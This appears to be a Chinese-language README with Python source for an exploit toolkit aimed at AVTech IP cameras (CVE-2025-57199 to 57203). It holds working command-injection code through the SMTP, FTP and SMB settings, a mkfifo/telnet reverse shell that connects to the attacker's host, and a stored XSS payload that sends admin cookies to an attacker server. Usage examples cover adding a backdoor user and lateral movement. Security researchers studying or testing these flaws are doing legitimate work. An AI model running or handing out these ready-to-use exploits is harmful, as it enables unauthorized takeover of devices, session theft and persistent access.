项目标题与描述
AVTech PoCs 是一个专门针对AVTech IP摄像机中多个已发现漏洞的概念验证(Proof of Concept)工具集合。该项目实现了对CVE-2025-57199、CVE-2025-57200、CVE-2025-57201、CVE-2025-57202和CVE-2025-57203的利用,通过自动化脚本演示了这些安全漏洞的实际危害。
核心价值在于为安全研究人员和渗透测试人员提供了一套完整的测试工具,用于验证AVTech IP摄像机的安全性,提高对物联网设备安全威胁的认识。
功能特性
- 多漏洞支持:完整覆盖CVE-2025-57199至CVE-2025-57203五个关键漏洞
- 多种攻击向量:
- SMTP配置命令注入(CVE-2025-57199)
- FTP配置命令注入(CVE-2025-57200)
- SMB配置命令注入(CVE-2025-57201)
- 网络故障检测命令注入(CVE-2025-57202)
- 存储型XSS攻击(CVE-2025-57203)
- 灵活的攻击方式:
- 直接命令执行
- 反向Shell获取
- XSS会话劫持
- 自动化利用流程:自动登录、配置获取、参数污染、功能触发
- 详细的调试输出:JSON格式的配置信息展示,便于分析和调试
安装指南
系统要求
- Python 3.6+
- 支持的网络环境(可访问目标设备)
- Linux/macOS/Windows操作系统
依赖安装
# 安装必要的Python依赖
pip install requests
# 克隆项目
git clone <repository-url>
cd avtech-pocs
环境配置
无需特殊配置,确保Python环境正确设置即可。
平台注意事项
- 所有脚本基于标准Python库,跨平台兼容
- 网络连接需要能够访问目标设备的Web管理端口(默认88)
- 反向Shell功能需要在攻击机上启动监听服务
使用说明
基础使用示例
1. SMTP命令注入攻击
python exploit_smtp.py --target-ip 192.168.1.100 --username admin --password admin --command "id"
2. FTP命令注入攻击
python exploit_ftp.py --target-ip 192.168.1.100 --username admin --password admin --command "uname -a"
3. 获取反向Shell
# 在攻击机上启动监听
nc -lvp 4444
# 执行反向Shell攻击
python exploit_smtp.py --target-ip 192.168.1.100 --username admin --password admin --attacker-ip 192.168.1.50 --attacker-port 4444 --reverse-shell
4. XSS会话窃取
# 在攻击机上启动HTTP服务监听
python -m http.server 8080
# 执行XSS攻击
python exploit_xss.py --target-ip 192.168.1.100 --username admin --password admin --attacker-ip 192.168.1.50 --attacker-port 8080
典型使用场景
场景1:安全评估验证
# 验证设备是否存在SMTP注入漏洞
python exploit_smtp.py -t 192.168.1.100 -U admin -P admin -c "echo 'Vulnerable!' > /tmp/test.txt"
场景2:权限维持
# 通过SMB配置注入创建后门用户
python exploit_smb.py -t 192.168.1.100 -c "useradd -r -s /bin/bash backdoor"
场景3:横向移动
# 使用XSS窃取管理员cookie,实现权限提升
python exploit_xss.py --target-ip 192.168.1.100 --attacker-ip 10.0.0.5 --attacker-port 9000
API概览
项目核心是DGM1104类,提供以下主要方法:
login(username, password): 设备认证get_ftp_fields(): 获取FTP配置get_smtp_fields(): 获取SMTP配置get_smb_fields(): 获取SMB配置get_network_failure_fields(): 获取网络故障检测配置set_config_fields(config_values): 设置配置参数execute_ftp_test(): 触发FTP测试execute_smtp_test(): 触发SMTP测试add_user(username, password): 添加用户(用于XSS攻击)
核心代码
1. 主设备交互类(dgm1104.py)
import random
from base64 import b64encode
from copy import deepcopy
from requests import ReadTimeout, Session, Response
from typing import Dict, List, Optional
from urllib.parse import quote
import logging
class DGM1104:
CONFIG_PATH: str = "/cgi-bin/user/Config.cgi"
PWDGRP_PATH: str = "/cgi-bin/supervisor/PwdGrp.cgi"
def __init__(self, hostname: str, port: int = 88, https: bool = False) -> None:
self.session = Session()
protocol: str = 'https' if https else 'http'
self.base_url: str = f'{protocol}://{hostname}:{port}'
def login(self, username: str, password: str) -> bool:
"""设备登录认证
Args:
username: 用户名
password: 密码
Returns:
登录是否成功
"""
account_string: str = f"{username}:{password}"
account_string_b64: str = b64encode(account_string.encode()).decode()
random_float: float = random.random()
verify_path: str = f"/cgi-bin/nobody/VerifyCode.cgi?account={account_string_b64}&rnd={random_float}"
url: str = self.base_url + verify_path
response: Response = self.session.get(url)
login_successful: bool = (
response.status_code == 200 and
len(self.session.cookies) >= 1
)
return login_successful
def get_config_category(self, category: str = "Network.FTP") -> Optional[Dict[str, str]]:
"""获取指定配置类别的所有字段
Args:
category: 配置类别路径
Returns:
配置字典或None(失败时)
"""
url: str = self.base_url + self.CONFIG_PATH
data: Dict[str, str] = {
"action": "get",
"category": f"{category}.*"
}
try:
response: Response = self.session.post(url=url, data=data)
response_lines: List[str] = response.text.split('\n')[2:]
if len(response_lines) <= 2:
return None
config_values: Dict[str, str] = {}
for line in response_lines:
first_equals_index = line.find('=')
if first_equals_index == -1:
continue
key: str = line[:first_equals_index]
value: str = line[first_equals_index+1:]
config_values[key] = value
return config_values
except Exception as e:
logging.error(f"Failed to get config category {category}: {e}")
return None
2. SMTP命令注入利用脚本(exploit_smtp.py)
import argparse
import json
import logging
import sys
from copy import deepcopy
from typing import Dict, Optional
from dgm1104 import DGM1104
EXIT_FAILURE: int = 1
EXIT_SUCCESS: int = 0
def exploit(
target_ip: str,
target_port: int,
username: str,
password: str,
command: str,
) -> bool:
"""执行SMTP配置命令注入攻击
Args:
target_ip: 目标设备IP
target_port: 目标设备端口
username: 认证用户名
password: 认证密码
command: 要执行的命令
Returns:
攻击是否成功
"""
# 初始化设备连接
device: DGM1104 = DGM1104(
hostname=target_ip,
port=target_port,
)
# 登录设备
logged_in:bool = device.login(
username=username,
password=password,
)
if not logged_in:
logging.error("[!] Failed to log into device.")
return False
logging.info("[+] Logged into device successfully.")
# 获取原始SMTP配置
original_smtp_fields: Optional[Dict[str, str]] = device.get_smtp_fields()
if original_smtp_fields is None:
logging.error("[!] Failed to get original SMTP fields")
return False
# 打印原始配置(调试信息)
original_smtp_fields_json_str: str = json.dumps(
original_smtp_fields,
indent=4,
)
logging.debug(
"[+] Retrieved Original SMTP Fields:\n" +
original_smtp_fields_json_str
)
# 构造恶意配置(命令注入)
new_smtp_fields: Dict[str, str] = deepcopy(original_smtp_fields)
new_smtp_fields["Network.SMTP.Sender"] = f"`{command}`"
# 设置恶意配置
smtp_fields_set: bool = device.set_config_fields(
config_values=new_smtp_fields,
)
if not smtp_fields_set:
logging.error("[!] Failed to set SMTP fields")
return False
logging.debug("[+] Set SMTP sender field with poisoned value.")
# 触发SMTP测试,执行命令
smtp_test_executed: bool = device.execute_smtp_test()
if not smtp_test_executed:
logging.error("[!] Failed to execute SMTP test.")
return False
logging.info("[+] Command Executed!")
return True
def reverse_shell(
target_ip: str,
target_port: int,
username: str,
password:str,
attacker_ip: str,
attacker_port: int,
) -> bool:
"""建立反向Shell连接
Args:
target_ip: 目标设备IP
target_port: 目标设备端口
username: 认证用户名
password: 认证密码
attacker_ip: 攻击者IP
attacker_port: 攻击者监听端口
Returns:
反向Shell是否成功建立
"""
# 构造反向Shell命令
reverse_shell_command: str = (
"TF=$(mktemp -u);mkfifo $TF && telnet " +
attacker_ip +
" " +
str(attacker_port) +
" 0<$TF | sh 1>$TF"
)
# 使用SMTP注入执行反向Shell命令
return exploit(
target_ip=target_ip,
target_port=target_port,
username=username,
password=password,
command=reverse_shell_command,
)
3. XSS攻击利用脚本(exploit_xss.py)
import argparse
import sys
from typing import Optional
from dgm1104 import DGM1104
EXIT_FAILURE: int = 1
EXIT_SUCCESS: int = 0
# 默认XSS Payload:简单的JavaScript弹窗
DEFAULT_PAYLOAD: str = '<img src=x onerror="print()" />'
def exploit(
target_ip: str,
target_port: int,
username: str,
password: str,
payload: str,
) -> bool:
"""执行存储型XSS攻击
Args:
target_ip: 目标设备IP
target_port: 目标设备端口
username: 认证用户名
password: 认证密码
payload: XSS攻击载荷
Returns:
攻击是否成功
"""
# 初始化设备连接
device: DGM1104 = DGM1104(
hostname=target_ip,
port=target_port,
)
# 登录设备
logged_in:bool = device.login(
username=username,
password=password,
)
if not logged_in:
print("[!] Failed to log into device.")
return False
print("[+] Logged into device successfully.")
# 添加恶意用户(用户名为XSS Payload)
user_added: bool = device.add_user(
username=payload,
password="password"
)
if not user_added:
print("[!] Failed to add user!")
return False
print(f"[+] Set created a user account with {payload} payload as username.")
print(f"[*] Either visit the accounts page to trigger the payload, or wait for another user to.")
return True
def generate_xss_cookie_payload(ip: str, port: str) -> str:
"""生成Cookie窃取XSS Payload
Args:
ip: 攻击者服务器IP
port: 攻击者服务器端口
Returns:
构造好的XSS Payload
"""
return f"""<img src=x onerror="this.src='http://{ip}:{port}/?'+document.cookie; this.removeAttribute('onerror');">"""
这些核心代码展示了项目的技术实现细节,包括设备交互、漏洞利用逻辑和攻击载荷构造。代码结构清晰,注释详细,便于安全研究人员理解和修改。 6HFtX5dABrKlqXeO5PUv//BvmoPhYvgx1TRcZLWgRyY=
